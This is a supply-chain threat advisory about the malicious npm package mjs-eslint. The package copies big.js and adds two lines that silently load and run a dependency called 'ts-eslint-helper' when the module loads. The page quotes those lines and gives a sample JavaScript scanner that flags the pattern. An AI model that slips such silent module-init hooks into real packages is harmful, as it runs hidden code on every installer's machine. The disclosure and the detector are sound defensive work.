Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in mjs-eslint (npm)

mjs-eslint

Risk score

92

AI summary

Indexed incident for mjs-eslint (npm).

Description

The package is published as 'mjs-eslint' but its description, file layout (big.js, big.mjs), and source are a verbatim copy of the legitimate big.js arbitrary-precision arithmetic library by Michael Mclaughlin. Two lines have been inserted into the IIFE at big.js:605-606 (and identically in big.mjs:605-606): const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. The corresponding dependency "ts-eslint-helper": "^4.0.1" is declared in package.json.

This call fires at module load on any require('mjs-eslint') or import of the package, executes asynchronously, and silently swallows all errors via .catch(()=>{}). An arithmetic library has no legitimate reason to load a 'ts-eslint' helper at module init, and the name mismatch between the host package (mjs-eslint), the cloned library (big.js), and the dependency (ts-eslint-helper) is the canonical pattern of hiding the payload one hop away in a transitive dependency to evade scanners.

Installer harm: any consumer who requires this package pulls in and executes whatever ts-eslint-helper's from_str() contains, with no visible signal.
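The description points at a detectable shape: a declared dependency is required at module load and its result is chained into a promise whose .catch handler is empty. The following heuristic scanner is an added example, not code from ThreatPkg or the package; the package.json and source text are constructed stand-ins that mirror the two quoted lines, so it runs offline.

```javascript
// Added example (not from the incident page): flag require() calls of a
// declared dependency whose result is used in a statement ending in an
// empty .catch() handler, the silent-at-module-init pattern described above.

// Constructed stand-in for the package manifest.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "mjs-eslint",
  version: "7.0.5",
  dependencies: { "ts-eslint-helper": "^4.0.1" },
});

// Constructed stand-in for the IIFE body; the two inserted lines mirror the
// ones quoted in the description.
const SAMPLE_SOURCE = `
;(function (GLOBAL) {
  var Big;
  const helper = require("ts-eslint-helper");
  helper.from_str().then(e => e).catch(e => { });
  GLOBAL.Big = Big;
})(this);
`;

// const|let|var NAME = require("DEP")
const REQUIRE_RE = /\b(?:const|let|var)\s+(\w+)\s*=\s*require\(\s*["']([^"']+)["']\s*\)/g;

// An empty .catch handler: .catch(e => { }), .catch(() => {}), .catch(function (e) {})
const EMPTY_CATCH_RE = /\.catch\(\s*(?:\(?\s*\w*\s*\)?\s*=>\s*\{\s*\}|function\s*\(\s*\w*\s*\)\s*\{\s*\})\s*\)/;

// Returns one finding per statement that calls a required dependency
// binding and swallows every rejection. Statements are split on ';'.
function findSilentDependencyCalls(packageJsonText, sourceText) {
  const pkg = JSON.parse(packageJsonText);
  const declared = new Set(Object.keys(pkg.dependencies || {}));
  const findings = [];
  for (const m of sourceText.matchAll(REQUIRE_RE)) {
    const [, binding, dep] = m;
    if (!declared.has(dep)) continue; // only declared deps: the one-hop pattern
    const useRe = new RegExp(`\\b${binding}\\.\\w+\\([^;]*?;`, "g");
    for (const u of sourceText.matchAll(useRe)) {
      if (EMPTY_CATCH_RE.test(u[0])) {
        findings.push({ package: pkg.name, dependency: dep, statement: u[0].trim() });
      }
    }
  }
  return findings;
}

console.log(JSON.stringify(findSilentDependencyCalls(SAMPLE_PACKAGE_JSON, SAMPLE_SOURCE), null, 2));
```

Run it against each package's package.json and entry files under node_modules; a hit on a library whose purpose has nothing to do with the required dependency is worth a manual diff against the upstream project.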

Technical details

Affected versions

= 7.0.5

Indicators

  • affected version = 7.0.5 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents